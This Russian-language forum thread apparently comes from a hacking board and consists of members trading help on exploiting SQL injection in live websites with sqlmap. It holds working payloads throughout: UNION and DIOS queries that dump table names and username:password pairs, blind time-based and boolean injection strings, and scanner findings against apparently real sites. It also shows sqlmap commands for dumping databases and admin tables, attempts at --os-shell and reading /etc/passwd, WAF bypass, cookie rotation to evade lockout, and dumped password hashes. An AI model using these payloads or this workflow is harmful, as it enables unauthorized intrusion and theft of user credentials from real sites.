Xsite said:
↑ (https://antichat.live/posts/4363174/)
может кто то помочь , привести в виду DIOSa ?
5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi
хотя тут юнион , но при этом выводит 1 запись оч долго


может кто то помочь , привести в виду DIOSa ? - Это как?

BabaDook said:
↑ (https://antichat.live/posts/4363179/)
может кто то помочь , привести в виду DIOSa ? - Это как?


как то так

https://defcon.ru/web-security/2320/

что бы он не по одной записи "выплевывал"

Xsite said:
↑ (https://antichat.live/posts/4363180/)
как то так
https://defcon.ru/web-security/2320/
что бы он не по одной записи "выплевывал"


Ну, загугли dios mssql.

п.с может лимит убрать?

BabaDook said:
↑ (https://antichat.live/posts/4363181/)
Ну, загугли dios mssql.
п.с может лимит убрать?


это mysql

п.с зачем убирать лимит , если https://rdot.org/forum/showthread.php?t=124&page=2

SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o

Xsite said:
↑ (https://antichat.live/posts/4363182/)
это mysql
п.с зачем убирать лимит , если
https://rdot.org/forum/showthread.php?t=124&page=2
SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM
{TABLE_NAME}
LIMIT
{S}
,
{N}
)r WHERE (@p:=concat_ws(0x2c,@p,
{COLUMN_NAME}
))>0))o


И как это к sqlmap относиться ?

Xsite said:
↑ (https://antichat.live/posts/4363182/)
это mysql
п.с зачем убирать лимит , если
https://rdot.org/forum/showthread.php?t=124&page=2
SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM
{TABLE_NAME}
LIMIT
{S}
,
{N}
)r WHERE (@p:=concat_ws(0x2c,@p,
{COLUMN_NAME}
))>0))o




Code:
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x) - таблицы
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name={NAME_TABLE_HEX}) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x) - колонки
(select (@x) from (select (@x:=0x00),(select (0) from ({TABLE_NAME})where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password)) ))x) - данные

И да не в той теме пост

Можно ли мапой посмотреть размер БД,таблиц,колонок ?

karkajoi said:
↑ (https://antichat.live/posts/4364398/)
Можно ли мапой посмотреть размер БД,таблиц,колонок ?


та сразу юзай -D ... --columns --count

Имелось в виду не количество записей в той или оной таблице , а их вес в B,МB

Кто сможет помочь, Акунет нашел скулю слепую.


0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7
Начинаю крутить Sql map пишу следующее

тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

Он мне пишет что параметр уязвим.

[16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable

it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Но потом ничего не находит

каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\

Что можно попробовать подскажите пожалуйста.

тут файл с куками и прочим -p "service" --dbs --time-sec 5 --risk=3 --level=5

попробуй так, или установи старую версию sqlmap

BabaDook said:
↑ (https://antichat.live/posts/4365586/)
тут файл с куками и прочим -p "service" --dbs --time-sec 5 --risk=3 --level=5
попробуй так, или установи старую версию sqlmap


Попробовал результат лучше но, теперь сервак выкидывает. Что можно далее предпринять?

[17:33:11] [INFO] POST parameter 'service' appears to be 'IBM DB2 stacked queries (heavy query - comment)' injectable

it looks like the back-end DBMS is 'IBM DB2'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'

[17:34:27] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'

[17:34:27] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'

[17:34:27] [INFO] checking if the injection point on POST parameter 'service' is a false positive

[17:34:27] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)

[17:34:27] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')

[17:34:27] [WARNING] false positive or unexploitable injection point detected

[17:34:27] [WARNING] POST parameter 'service' does not seem to be injectable

[17:34:27] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

в мапе --current-db ,вроде как текущая база,но что значит текущая? бд домена где скуля или как?

hashfinderboss said:
↑ (https://antichat.live/posts/4365656/)
в мапе --current-db ,вроде как текущая база,но что значит текущая? бд домена где скуля или как?


да

ex3x1 said:
↑ (https://antichat.live/posts/4367716/)
Приветствую. Слепая инъекция в личном кабинете на сайте в get запросе, поэтому использую --cookie, скульмап выдает следующее:

Code:
[WARNING] provided parameter 'utm_source' appears to be 'base64' encoded
[WARNING] provided parameter 'laravel_session' appears to be 'base64' encoded
Cookie parameter 'XSRF-TOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]

Независимо от того выберу я y или N - сыпется 500 ошибка, и мап ни чего не находит. Пересканивал акунетиксом раз 5, он постоянно детектит скулю и по логам получает 200 OK, а не 500 ошибку. Как раскрутить мапом? В чем проблема?
Куки такого вида:

Code:
XSRF-TOKEN=eyJpdiI6IkxhNDJjRWk4Um9pWURqTjdzbCtQV1E9PSIs InZhbHVlIjoiRHhoZlk5K1h5YnI3QzQwSVlIZnBydUJcL0xhdG JvdHdYMmNtWDZnaGlOc2RsSnVaM1lCUVg3VnoyK041c2xLaE9u eEVzN2M0aGlQXC9VdGgwS2Vubys1dz09IiwibWFjIjoiNDg3YW IyZjhkYjg0Zjk0ZTk3MDEyZWJkMDAzY2Q1YmE2Yzk3NGYwMDEw NTA4ODM5M2M4NDRjZjdlYjJiZWZmZiJ9

laravel_session=eyJpdiI6InNZdEV1WVJ0Z1dVaHRnXC82UW ZNM21BPT0iLCJ2YWx1ZSI6InFJa3NJVHk3eFh1cDBhaHROZGJr XC80RytQSXBkMFJTSEFRWXBLSVp3STlTdWV1RnBMRHNZOFwvMW ltZ2Nvb3pFdCtZVlNTUUVUUEYwNUpNbk5ybXFiTHc9PSIsIm1h YyI6IjA1ZjUxZGEyM2Q5YmIyZWQ3MmVmMjE5N2E0YjZlNWUyND A5ODgyNGEyNzNmZmRmZTk3Y2RkMjM0NTcyNGVlMjMifQ



--ignore-code=500 по пробуй

ex3x1 said:
↑ (https://antichat.live/posts/4367716/)
Приветствую. Слепая инъекция в личном кабинете на сайте в get запросе, поэтому использую --cookie, скульмап выдает следующее:

Code:
[WARNING] provided parameter 'utm_source' appears to be 'base64' encoded
[WARNING] provided parameter 'laravel_session' appears to be 'base64' encoded
Cookie parameter 'XSRF-TOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]

Независимо от того выберу я y или N - сыпется 500 ошибка, и мап ни чего не находит. Пересканивал акунетиксом раз 5, он постоянно детектит скулю и по логам получает 200 OK, а не 500 ошибку. Как раскрутить мапом? В чем проблема?
Куки такого вида:

Code:
XSRF-TOKEN=eyJpdiI6IkxhNDJjRWk4Um9pWURqTjdzbCtQV1E9PSIs InZhbHVlIjoiRHhoZlk5K1h5YnI3QzQwSVlIZnBydUJcL0xhdG JvdHdYMmNtWDZnaGlOc2RsSnVaM1lCUVg3VnoyK041c2xLaE9u eEVzN2M0aGlQXC9VdGgwS2Vubys1dz09IiwibWFjIjoiNDg3YW IyZjhkYjg0Zjk0ZTk3MDEyZWJkMDAzY2Q1YmE2Yzk3NGYwMDEw NTA4ODM5M2M4NDRjZjdlYjJiZWZmZiJ9

laravel_session=eyJpdiI6InNZdEV1WVJ0Z1dVaHRnXC82UW ZNM21BPT0iLCJ2YWx1ZSI6InFJa3NJVHk3eFh1cDBhaHROZGJr XC80RytQSXBkMFJTSEFRWXBLSVp3STlTdWV1RnBMRHNZOFwvMW ltZ2Nvb3pFdCtZVlNTUUVUUEYwNUpNbk5ybXFiTHc9PSIsIm1h YyI6IjA1ZjUxZGEyM2Q5YmIyZWQ3MmVmMjE5N2E0YjZlNWUyND A5ODgyNGEyNzNmZmRmZTk3Y2RkMjM0NTcyNGVlMjMifQ





karkajoi said:
↑ (https://antichat.live/posts/4367727/)
--ignore-code=500 по пробуй


Помогло? У меня несколько раз прокатывало

как то можно поменять пароль в админку через мап?

может быть возможно если есть привлегии и тп?

hashfinderboss said:
↑ (https://antichat.live/posts/4367914/)
как то можно поменять пароль в админку через мап?
может быть возможно если есть привлегии и тп?


Возможно, если есть приведении и тп то можно шел залить и делать все что угодно

hashfinderboss said:
↑ (https://antichat.live/posts/4367914/)
как то можно поменять пароль в админку через мап?
может быть возможно если есть привлегии и тп?


Если инъекция в UPDATE или после ; то можно попробовать.

winstrool said:
↑ (https://antichat.live/posts/4368015/)
Если инъекция в
UPDATE
или после
;
то можно попробовать.


я знаю что есть ерор,унион,болеан,таймбасе� �,стэйкед,инлине а как выглядит UPDATE?как проверить UPDATE или нет?

Доброго времени всем. При таком запросе:

sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive

Получаю название бд. Дальше при такой команде:

sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables

Получаю следующее:

.SpoilerTarget" type="button">Spoiler: Скриншот
https://c.radikal.ru/c14/2004/77/de2cb570b78f.png

Пробовал напрямую делать запрос:

sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns

Такая же ошибка

https://d.radikal.ru/d10/2004/85/d3370d81b8a6.png

Я так понимаю дело в этом?

https://a.radikal.ru/a41/2004/93/9e13b668ef06.png

Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?

Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.

P.s

Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.

Есть предложение на взаимовыгодных условиях.

hashfinderboss said:
↑ (https://antichat.live/posts/4368162/)
я знаю что есть ерор,унион,болеан,таймбасе� �,стэйкед,инлине а как выглядит UPDATE?


UPDATE, это оператор который обновляет столбцы в базе данных.

mysql.ru/docs/man/UPDATE.html (http://www.mysql.ru/docs/man/UPDATE.html)


hashfinderboss said:
↑ (https://antichat.live/posts/4368162/)
как проверить UPDATE или нет?


Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause

Застрял на этом моменте:

https://c.radikal.ru/c18/2004/70/1e7fb9c92473.png

Подскажите, что делать дальше?

mixer123 said:
↑ (https://antichat.live/posts/4375978/)
Застрял на этом моменте:
https://c.radikal.ru/c18/2004/70/1e7fb9c92473.png
Подскажите, что делать дальше?


Искать тамперы

Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться

например это?

The vulnerability affects https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW , X-Forwarded-For

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Tests performed:

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218

Original value: 3iv1i

HTTP Request

arrow_drop_up

GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1

Referer: https://www.google.com/search?hl=en&q=testing

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0

X-Requested-With: XMLHttpRequest

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: copyfaxes.com

Connection: Keep-alive

rozzet said:
↑ (https://antichat.live/posts/4381603/)
Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться
например это?
The vulnerability affects
https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW
, X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
arrow_drop_up
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive


и это например?буду предельно благодарен за помощь.

The vulnerability affects https://www.site.com/ , /-- -.html

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

Path Fragment input /-- -.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

Tests performed:

volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*3 FALSE

volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*3*9 FALSE

volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 5*6 FALSE

volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE

Original value: volts-amplifier-and-cd-players

HTTP Request

arrow_drop_up

GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUN L-1517.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://www.site.com/

Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: www.site.com (http://www.samstores.com/)

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive

Всем привет. Acunetix выдал такое:


Code:
Уязвимость затрагивает https://www.site.com/ , / / / / /

Обнаружено слепым SQL-инъекцией

Детали атаки
arrow_drop_up
Вход фрагмента пути / / / / / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены

тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31

Первоначальное значение: doe-spiransuchor

HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /

Как правильно скормить в sqlmap?

vladF said:
↑ (https://antichat.live/posts/4382741/)
Всем привет. Acunetix выдал такое:

Code:
Уязвимость затрагивает https://www.site.com/ , / / / / /

Обнаружено слепым SQL-инъекцией

Детали атаки
arrow_drop_up
Вход фрагмента пути / / / / / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены

тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31

Первоначальное значение: doe-spiransuchor

HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /

Как правильно скормить в sqlmap?


Точно так же как написали выше, со слепыми может быть ложное срабатывание

karkajoi said:
↑ (https://antichat.live/posts/4382754/)
Точно так же как написали выше, со слепыми может быть ложное срабатывание


Двумя сканерами проверил,не должна быть ложная

Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо?

Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется.

back-end DBMS: MySQL >= 5.0.0

banner: '5.7.26-log'

server: Apache/2.2.15 (CentOS)

x-powered-by: PHP/5.3.3

столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)

karkajoi said:
↑ (https://antichat.live/posts/4382754/)
Точно так же как написали выше, со слепыми может быть ложное срабатывание


если акунетикс пишет SQL injection а не блинд, значит ложные исключены?

Как часто акунетикс выдает ложные скули?

rozzet said:
↑ (https://antichat.live/posts/4384792/)
если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
Как часто акунетикс выдает ложные скули?


Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15

Буду рад помощи, сливаю базу ниже указанным способом:


Code:
sqlmap -r my_http --dump --threads=5 --dbms=mysql --dump -D some_db --risk=3

Скорость просто ужас(пробовал менять потоки, тайминги итд.. результата ноль) Как следствие Пробую слить данные только админов, указываю таблицу и запускаю:


Code:
sqlmap -r my_http --dump --threads=5 --dbms=mysql --dump -D some_db -T admin_table --risk=3

[12:15:44] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:15:56] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[12:15:57] [INFO] adjusting time delay to 1 second due to good response times
[12:15:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:15:58] [ERROR] unable to retrieve the number of columns for table 'admin_table' in database 'some_db'
[12:15:58] [WARNING] unable to retrieve column names for table 'admin_table' in database 'some_db'
[12:18:10] [WARNING] unable to enumerate the columns for table 'admin_table' in database 'some_db'
[12:18:10] [INFO] fetched data logged to text files under '/root/.sqlmap/....'

Получаю облом.... Пробую --sql-shell:


Code:
sql-shell> SELECT LOAD_FILE('/etc/passwd');
[INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
[INFO] retrieved:

sql-shell> desc mysql.user
[INFO] fetching SQL query output: 'desc mysql.user'
[INFO] retrieved:

sql-shell> SELECT * FROM mysql.user;
[INFO] fetching SQL SELECT statement query output: 'SELECT * FROM mysql.user'
[INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[INFO] fetching columns for table 'user' in database 'mysql'
[INFO] retrieved:
[ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
[INFO] retrieved:
[WARNING] the SQL query provided does not return any output

Снова облом а именно... в первых двух случаях получаю просто пустые строки, в третьем случае просто ошибка, пробую заюзать --os-shell:


Code:
[WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search

Если лить в первый path-и(1) то получаю постоянно 404 (Not Found)

пробовал сразу сбрутить(4) по предоставленному sqlmap-ом словарю... но все без результата.

Главный вопрос: как так я могу получить дамп всей базы но не имею возможность указать конкретную таблицу?

Пробовал имя таблицы указывать в ' ' подскажите что я упускаю...

Решение:

Напишу вдруг кому то поможет В моем случае проблема была в том что при запуске я 'соглашался' на редирект, после отказа от редиректа данные начали извлекаться нормально.

Нужна помощь

Сканер выдал такое:


Code:
This vulnerability affects /part_eYXfQU0lw9rhwob9qRP2GVMv.html.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input partid was set to -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'='

Tests performed:
-1' OR 2+323-323-1=0+0+0+1 or 'XAZghp6T'=' => TRUE
-1' OR 3+323-323-1=0+0+0+1 or 'XAZghp6T'=' => FALSE
-1' OR 3*2 FALSE
-1' OR 3*2>(0+5+323-323) or 'XAZghp6T'=' => FALSE
-1' OR 2+1-1-1=1 AND 000323=000323 or 'XAZghp6T'=' => TRUE
-1' OR 000323=000323 AND 3+1-1-1=1 or 'XAZghp6T'=' => FALSE
-1' OR 3*2=5 AND 000323=000323 or 'XAZghp6T'=' => FALSE
-1' OR 3*2=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
-1' OR 3*2*0=6 AND 000323=000323 or 'XAZghp6T'=' => FALSE
-1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE

Как правильно скормить в sqlmap?

как можно скормить sqlmap уязвимость в хедере?

FireRidlle said:
↑ (https://antichat.live/posts/4389542/)
как можно скормить sqlmap уязвимость в хедере?


Вы можете полностью скопировать запрос в текстовый файл и в уязвимом параметре поставить знак (https://github.com/sqlmapproject/sqlmap/wiki/Usage#arbitrary-injection-point) * и потом уже стартовать скульмап:


Code:
sqlmap -r "zapros.txt"

или же скопировать запрос и при старте указать (https://github.com/sqlmapproject/sqlmap/wiki/Usage#testable-parameters) тестируемый параметр/хедер (например User-Agent):


Code:
sqlmap -r "zapros.txt" -p "user-agent"

Добрый подскажите как вытянуть пароль в blob?

Пробовал и hex и прочее никак не тянет((


Code:
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'

Вечно такой результат

http://joxi.ru/ZrJVX1phw8dRor

http://joxi.ru/KAgK8yWFEDPj0A

kacergei said:
↑ (https://antichat.live/posts/4390174/)
Добрый подскажите как вытянуть пароль в blob?
Пробовал и hex и прочее никак не тянет((

Code:
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'

Вечно такой результат
http://joxi.ru/ZrJVX1phw8dRor
http://joxi.ru/KAgK8yWFEDPj0A


https://github.com/sqlmapproject/sqlmap/issues/3158

Приветствую! Проблема такая: при сливе обрезается хеш:


Code:
[04:41:49] [INFO] retrieved: 'test@mail.com','$2y$10$IN1YM1wQoCAAI...
[04:41:51] [INFO] retrieved: 'test@mail.com','$2y$10$s7Y6jmxm0Lk5MYk6p727...
[04:41:53] [INFO] retrieved: 'test@mail.net','$2y$10$zIlubVWzn/zVAbNef...
[04:41:54] [INFO] retrieved: 'test@mail.com','$H\\2y$7KguiftaH$10\\ZByke...
[04:41:56] [INFO] retrieved: 'test@mail.com','$2y$10$8ycUx4ZRAtEvOpHS...
[04:41:58] [INFO] retrieved: 'test@mail.com','$2y$10$X2cd3HkmJs5f3DsUtzk...
[04:42:00] [INFO] retrieved: 'test@mail.com','$2y$10$52HMKZS6r4HT...

Как это побороть? Пробовал hex, no-cast

vladF said:
↑ (https://antichat.live/posts/4390982/)
Приветствую! Проблема такая: при сливе обрезается хеш:

Code:
[04:41:49] [INFO] retrieved: 'test@mail.com','$2y$10$IN1YM1wQoCAAI...
[04:41:51] [INFO] retrieved: 'test@mail.com','$2y$10$s7Y6jmxm0Lk5MYk6p727...
[04:41:53] [INFO] retrieved: 'test@mail.net','$2y$10$zIlubVWzn/zVAbNef...
[04:41:54] [INFO] retrieved: 'test@mail.com','$H\\2y$7KguiftaH$10\\ZByke...
[04:41:56] [INFO] retrieved: 'test@mail.com','$2y$10$8ycUx4ZRAtEvOpHS...
[04:41:58] [INFO] retrieved: 'test@mail.com','$2y$10$X2cd3HkmJs5f3DsUtzk...
[04:42:00] [INFO] retrieved: 'test@mail.com','$2y$10$52HMKZS6r4HT...

Как это побороть? Пробовал hex, no-cast


С чё ты взял? Зайти в файл дампа и там посмотри, в консоле может и режет, потому что не влазит

karkajoi said:
↑ (https://antichat.live/posts/4391032/)
С чё ты взял? Зайти в файл дампа и там посмотри, в консоле может и режет, потому что не влазит


Спасибо,разобрался. Просто при сливе базы, данные сохраняются лишь в sqlite файл сессии. Если закрыть консоль, то дамп не сохраняется,нужно ждать пока он полностью не сольется. С помощью --stop 100, сдампил первые 100 строк и глянул, все хорошо)

vladF said:
↑ (https://antichat.live/posts/4391046/)
Спасибо,разобрался. Просто при сливе базы, данные сохраняются лишь в sqlite файл сессии. Если закрыть консоль, то дамп не сохраняется,нужно ждать пока он полностью не сольется. С помощью --stop 100, сдампил первые 100 строк и глянул, все хорошо)


ctrl+c нажимаешь и дамп сохраняется

Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо

http://prntscr.com/st216j


Code:
